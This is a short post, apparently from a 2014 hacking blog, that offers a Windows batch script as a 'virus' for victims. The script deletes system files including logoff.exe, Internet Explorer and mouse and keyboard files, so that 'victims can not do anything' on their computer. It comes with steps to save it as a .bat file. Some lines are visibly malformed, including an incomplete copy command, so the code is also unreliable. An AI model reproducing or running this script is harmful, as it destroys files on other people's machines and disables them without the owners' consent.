Virus to Delete mouse,explore,logoff using Batch Programming - HACKING LIKE A PRO

Latest

Sunday 7 December 2014

Virus to Delete mouse,explore,logoff using Batch Programming






Usually we write simple viruses in batch programming.  This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer.





1.Open notepad and paste below code in notepad.



@echo off
@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe

2. save as "anything.bat"

WARNING: DO NOT CLICK ON THIS FILE IN YOUR OWN COMPUTER...

2 comments: